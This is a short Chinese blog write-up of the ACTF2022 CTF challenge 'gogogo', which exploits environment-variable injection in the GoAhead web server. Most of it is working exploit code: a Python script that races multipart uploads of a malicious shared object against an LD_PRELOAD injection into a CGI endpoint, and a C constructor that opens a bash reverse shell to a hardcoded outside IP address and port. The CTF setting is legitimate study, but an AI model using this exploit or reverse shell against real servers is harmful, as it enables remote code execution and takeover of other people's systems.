【ACTF2022】gogogo

看了下居然一个月没有更新博客了,赶快把最近的比赛搬出来水一水
ACTF居然在我期末周考试,然后我还要预习那些考试科目,所以阿,只做了一题,V&N的烨师傅尝试做第二题,思路有了但是没有时间做。

这一题呢主要是通过GoAhead环境变量注入
在做题之前呢,搜了下,找到了一篇相关的Vulhub漏洞复现的文章
具体的就这些
Github-exploits
exp.py

import requests, random
from concurrent import futures
from requests_toolbelt import MultipartEncoder
hack_so = open('hack.so','rb').read()
def upload(url):
    m = MultipartEncoder(
        fields = {
            'file':('1.txt', hack_so,'application/octet-stream')
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def include(url):
    m = MultipartEncoder(
        fields = {
            'LD_PRELOAD': '/proc/self/fd/7',
        }
    )
    r = requests.post(
        url = url,
        data=m,
        headers={'Content-Type': m.content_type}
    )
def race(method):
    url = 'http://localhost:10218/cgi-bin/hello'
    if method == 'include':
        include(url)
    else:
        upload(url)
def main():
    task = ['upload','include'] * 1000
    random.shuffle(task) # 
    with futures.ThreadPoolExecutor(max_workers=5) as executor:
        results = list(executor.map(race, task))
if __name__ == "__main__":
    main()

hack.c

#include 
#include 
#include 
__attribute__ ((__constructor__)) void aaanb(void)
{
    unsetenv("LD_PRELOAD");
    system("touch /tmp/success");
    system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'");
}

hack.so
github上自行提取

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇